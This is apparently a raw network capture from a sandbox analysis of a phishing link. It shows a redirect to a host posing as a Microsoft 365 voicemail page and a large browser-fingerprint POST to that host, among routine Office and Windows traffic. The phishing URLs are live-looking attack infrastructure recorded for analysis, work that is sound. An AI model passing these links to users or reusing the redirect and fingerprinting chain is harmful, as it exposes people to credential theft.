                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:26:56 UTC804INHTTP/1.1 302 Found
                                                        Date: Tue, 12 Nov 2024 15:26:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: public, max-age=600, stale-if-error=86400, stale-while-revalidate=600, no-store
                                                        location: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        x-content-type-options: nosniff
                                                        x-whom: tly-app
                                                        x-do-app-origin: 86336e98-11a6-477d-b2fb-e3113d9e1e21
                                                        x-do-orig-status: 302
                                                        Vary: Accept-Encoding
                                                        CF-Cache-Status: EXPIRED
                                                        Server-Timing: cfCacheStatus;desc="EXPIRED"
                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                        Server: cloudflare
                                                        CF-RAY: 8e178b0f087ee7af-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-11-12 15:26:56 UTC565INData Raw: 34 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 76 69 70 2e 6b 65 72 6a 61 73 69 6d 70 6c 65 2e 63 6f 6d 2f 6d 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 33 5a 76 61 57 4e 6c 4a 6e 4a 68 62 6d 51 39 56 30 68 61 53 31 64 48 4e 44 30 6d 64 57 6c 6b 50 56 56 54 52 56 49 77 4e 6a 45 78 4d 6a 41 79 4e 46 55 78 4d 54 45 78 4d 44 59 77 4f 51 3d 3d 4e 30 31 32 33 4e 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74
                                                        Data Ascii: 493<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N'" /> <tit
                                                        2024-11-12 15:26:56 UTC613INData Raw: 68 74 74 70 73 3a 2f 2f 76 69 70 2e 6b 65 72 6a 61 73 69 6d 70 6c 65 2e 63 6f 6d 2f 6d 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 33 5a 76 61 57 4e 6c 4a 6e 4a 68 62 6d 51 39 56 30 68 61 53 31 64 48 4e 44 30 6d 64 57 6c 6b 50 56 56 54 52 56 49 77 4e 6a 45 78 4d 6a 41 79 4e 46 55 78 4d 54 45 78 4d 44 59 77 4f 51 3d 3d 4e 30 31 32 33 4e 3c 2f 61 3e 2e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 63 6c 6f 75 64 66 6c 61 72 65 69 6e 73 69 67 68 74 73 2e 63 6f 6d 2f 62 65 61 63 6f 6e 2e 6d 69 6e 2e 6a 73 2f 76 63 64 31 35 63 62 65 37 37 37 32 66 34 39 63 33 39 39 63 36 61 35 62 61 62 66 32 32 63 31 32 34 31 37 31 37 36 38 39 31 37 36 30 31 35 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68
                                                        Data Ascii: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N</a>. <script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sh
                                                        2024-11-12 15:26:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.649719159.89.194.494436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:26:57 UTC747OUTGET /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N HTTP/1.1
                                                        Host: vip.kerjasimple.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:26:58 UTC461INHTTP/1.1 200 OK
                                                        cache-control: no-store
                                                        set-cookie: _cid=5f71965d2c5dc4b3564f21c2f63a98cd; expires=Tue, 12-Nov-2024 15:27:58 GMT; Max-Age=60
                                                        content-type: text/html; charset=UTF-8
                                                        content-length: 4713
                                                        date: Tue, 12 Nov 2024 15:26:58 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        connection: close
                                                        2024-11-12 15:26:58 UTC4713INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 0a 20
                                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="root">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.64972013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:26:58 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:26:58 UTC492INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:26:58 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 218853
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public
                                                        Last-Modified: Mon, 11 Nov 2024 13:19:38 GMT
                                                        ETag: "0x8DD02537E74B538"
                                                        x-ms-request-id: a1588731-601e-000d-094b-342618000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152658Z-16547b76f7f7scqbhC1DFW0m5w0000000fs0000000002w71
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:26:58 UTC15892INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                        2024-11-12 15:26:58 UTC16384INData Raw: 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                        Data Ascii: <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V
                                                        2024-11-12 15:26:58 UTC16384INData Raw: 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54
                                                        Data Ascii: 20v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="T
                                                        2024-11-12 15:26:58 UTC16384INData Raw: 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d
                                                        Data Ascii: T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F=
                                                        2024-11-12 15:26:59 UTC16384INData Raw: 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a
                                                        Data Ascii: alse"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C>
                                                        2024-11-12 15:26:59 UTC16384INData Raw: 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70
                                                        Data Ascii: I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="Cleanup
                                                        2024-11-12 15:26:59 UTC16384INData Raw: 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20
                                                        Data Ascii: </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R>
                                                        2024-11-12 15:26:59 UTC16384INData Raw: 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C>
                                                        2024-11-12 15:26:59 UTC16384INData Raw: 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" />
                                                        2024-11-12 15:26:59 UTC16384INData Raw: 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20
                                                        Data Ascii: <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.649724184.28.90.27443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:26:59 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: fs.microsoft.com
                                                        2024-11-12 15:26:59 UTC467INHTTP/1.1 200 OK
                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                        Content-Type: application/octet-stream
                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                        Server: ECAcc (lpl/EF06)
                                                        X-CID: 11
                                                        X-Ms-ApiVersion: Distribute 1.2
                                                        X-Ms-Region: prod-weu-z1
                                                        Cache-Control: public, max-age=177482
                                                        Date: Tue, 12 Nov 2024 15:26:59 GMT
                                                        Connection: close
                                                        X-CID: 2


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.649722159.89.194.494436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:26:59 UTC1042OUTPOST /m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N HTTP/1.1
                                                        Host: vip.kerjasimple.com
                                                        Connection: keep-alive
                                                        Content-Length: 139134
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        Origin: https://vip.kerjasimple.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: _cid=5f71965d2c5dc4b3564f21c2f63a98cd
                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2024-11-12 15:26:59 UTC16384OUTData Raw: 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65
                                                        Data Ascii: ocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDe
